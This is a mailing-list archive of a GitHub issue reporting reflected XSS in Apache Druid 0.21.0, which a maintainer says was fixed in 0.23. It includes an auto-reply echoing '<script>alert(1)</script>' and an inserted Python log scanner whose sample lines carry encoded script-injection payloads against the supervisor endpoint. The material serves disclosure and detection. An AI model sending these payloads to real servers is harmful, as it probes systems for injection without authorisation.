Posted to commits@druid.apache.org by GitBox <gi...@apache.org> on 2022/09/07 10:29:02 UTC

[GitHub] [druid] vsuppor opened a new issue, #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

vsuppor opened a new issue, #13044:
URL: https://github.com/apache/druid/issues/13044

   Apache Druid version 0.21.0 has a reflection-type XSS vulnerability: attackers can maliciously construct JS code to attack the front page.
   ![image](https://user-images.githubusercontent.com/113024228/188856457-34c0092e-909f-4bd3-b5a0-d4728c5d38af.png)
   ![image](https://user-images.githubusercontent.com/113024228/188856489-e4b68daf-b99c-4f33-ba31-0c1580b85806.png)
   ![image](https://user-images.githubusercontent.com/113024228/188856516-f3a671a9-d36c-4a81-a606-eb20423eecb8.png)
   


-- 
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.

To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org.apache.org

For queries about this service, please contact Infrastructure at:
users@infra.apache.org


---------------------------------------------------------------------
To unsubscribe, e-mail: commits-unsubscribe@druid.apache.org
For additional commands, e-mail: commits-help@druid.apache.org
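
A defender-side check for the request pattern in this report, added here as an example (not part of the original thread and not Druid's own code): it scans access-log lines for requests to /druid/indexer/v1/supervisor/<id> whose ID segment decodes to HTML metacharacters, including double-encoded forms. The Common Log Format layout, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Path prefix from the report; everything after it is the supervisor ID
# (plus any sub-resource such as /status).
SUPERVISOR_PATH = re.compile(r"^/druid/indexer/v1/supervisor/(.*)$", re.IGNORECASE)
# Characters that matter in an HTML context and are not expected in an ID.
HTML_META = re.compile(r"[<>\"'`]")
# Request field of a Common Log Format line (assumed log layout).
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Percent-decode until stable so double-encoded input is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_supervisor_requests(log_lines):
    """Return (client, decoded_id) for supervisor requests carrying markup."""
    hits = []
    for line in log_lines:
        req = REQUEST.search(line)
        if not req:
            continue
        path = req.group("target").split("?", 1)[0]
        match = SUPERVISOR_PATH.match(path)
        if not match:
            continue
        supervisor_id = fully_decode(match.group(1))
        if HTML_META.search(supervisor_id):
            hits.append((line.split()[0], supervisor_id))
    return hits


# Constructed sample lines (documentation IP ranges, not real hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Sep/2022:10:01:00 +0000] "GET /druid/indexer/v1/supervisor/wikipedia/status HTTP/1.1" 200 512',
    '198.51.100.7 - - [07/Sep/2022:10:02:11 +0000] "GET /druid/indexer/v1/supervisor/1%3CScRiPt%3Ealert(1)%3C%2FScRiPt%3E HTTP/1.1" 404 97',
    '198.51.100.7 - - [07/Sep/2022:10:02:15 +0000] "GET /druid/indexer/v1/supervisor/1%253CScRiPt%253Ealert(1)%253C%252FScRiPt%253E HTTP/1.1" 404 97',
    '192.0.2.10 - - [07/Sep/2022:10:03:40 +0000] "GET /druid/indexer/v1/task/index_1 HTTP/1.1" 200 230',
]

if __name__ == "__main__":
    for client, decoded_id in suspicious_supervisor_requests(SAMPLE_LOG):
        print(client, repr(decoded_id))
```

Matching on decoded metacharacters rather than on the literal string "script" keeps the check independent of letter case and tag name.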


[GitHub] [druid] vsuppor commented on issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

Posted by GitBox <gi...@apache.org>.
vsuppor commented on issue #13044:
URL: https://github.com/apache/druid/issues/13044#issuecomment-1239397241

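   Hello. I have received your email and will deal with it as soon as possible after the holiday ends. <script>alert(1)</script><script>alert(1)</script><script>alert(1)</script> ------------ This is an automatic reply email from QQ Mail.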




[GitHub] [druid] FrankChen021 commented on issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

Posted by GitBox <gi...@apache.org>.
FrankChen021 commented on issue #13044:
URL: https://github.com/apache/druid/issues/13044#issuecomment-1239396898

   Thanks for reporting. This problem has been addressed in 0.23.




[GitHub] [druid] FrankChen021 closed issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability

Posted by GitBox <gi...@apache.org>.
FrankChen021 closed issue #13044: Apache Druid version 0.21.0 has a reflection type XSS vulnerability
URL: https://github.com/apache/druid/issues/13044

